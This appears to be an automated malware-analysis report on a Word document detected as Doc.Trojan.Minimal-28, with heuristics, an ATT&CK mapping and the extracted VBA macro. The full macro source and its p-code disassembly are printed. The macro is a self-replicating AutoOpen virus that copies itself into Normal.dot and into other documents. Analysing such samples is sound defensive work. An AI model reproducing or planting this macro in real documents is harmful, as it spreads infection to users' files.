MALICIOUS
200
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample contains a VBA macro with an AutoOpen subroutine, a common technique for executing malicious code upon document opening. The script attempts to copy itself to the Normal.dot template, which could lead to persistence or infection of other documents. The presence of legacy WordBasic functions and the specific macro name 'autoopen' are strong indicators of malicious intent.
Heuristics 4
-
ClamAV: Doc.Trojan.Minimal-28 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Minimal-28
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2562 bytes |
SHA-256: d970a7a646b490ef026824f9defbbfb3e60a7d37f7c51f89338608c79b72d765 |
|||
|
Detection
ClamAV:
Doc.Trojan.Minimal-28
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "autoopen"
Public Sub MAIN()
Dim a$
Dim b$
Dim c$
a$ = "autoopen"
b$ = WordBasic.[FileName$]()
c$ = WordBasic.[DefaultDir$](2) + "\normal.dot"
Dim a_ As Object: Set a_ = WordBasic.DialogRecord.Organizer(False)
Set a_ = WordBasic.CurValues.Organizer
a_.Copy = 1
a_.Tab = 3
a_.Name = a$
a_.Source = b$
a_.Destination = c$
On Error Resume Next
WordBasic.Organizer a_
If WordBasic.CountMacros(1) = 0 Then
a_.Source = c$
a_.Destination = b$
WordBasic.Organizer a_
WordBasic.FileSaveAs Format:=1
End If
End Sub
' Processing file: /opt/analyzer/scan_staging/30b4bebca564444e9369d55c49f3a7e5.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 965 bytes
' Macros/VBA/autoopen - 2366 bytes
' Line #0:
' Line #1:
' FuncDefn (Public Sub MAIN())
' Line #2:
' Dim
' VarDefn a
' Line #3:
' Dim
' VarDefn B
' Line #4:
' Dim
' VarDefn c
' Line #5:
' LitStr 0x0008 "autoopen"
' St a$
' Line #6:
' Ld WordBasic
' ArgsMemLd [FileName$] 0x0000
' St B$
' Line #7:
' LitDI2 0x0002
' Ld WordBasic
' ArgsMemLd [DefaultDir$] 0x0001
' LitStr 0x000B "\normal.dot"
' Add
' St c$
' Line #8:
' Dim
' VarDefn a_ (As Object)
' BoS 0x0000
' SetStmt
' LitVarSpecial (False)
' Ld WordBasic
' MemLd DialogRecord
' ArgsMemLd Organizer 0x0001
' Set a_
' Line #9:
' SetStmt
' Ld WordBasic
' MemLd CurValues
' MemLd Organizer
' Set a_
' Line #10:
' LitDI2 0x0001
' Ld a_
' MemSt Copy
' Line #11:
' LitDI2 0x0003
' Ld a_
' MemSt Text
' Line #12:
' Ld a$
' Ld a_
' MemSt New
' Line #13:
' Ld B$
' Ld a_
' MemSt Source
' Line #14:
' Ld c$
' Ld a_
' MemSt Destination
' Line #15:
' OnError (Resume Next)
' Line #16:
' Ld a_
' Ld WordBasic
' ArgsMemCall Organizer 0x0001
' Line #17:
' LitDI2 0x0001
' Ld WordBasic
' ArgsMemLd CountMacros 0x0001
' LitDI2 0x0000
' Eq
' IfBlock
' Line #18:
' Ld c$
' Ld a_
' MemSt Source
' Line #19:
' Ld B$
' Ld a_
' MemSt Destination
' Line #20:
' Ld a_
' Ld WordBasic
' ArgsMemCall Organizer 0x0001
' Line #21:
' LitDI2 0x0001
' ParamNamed Format$
' Ld WordBasic
' ArgsMemCall FileSaveAs 0x0001
' Line #22:
' EndIfBlock
' Line #23:
' EndSub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.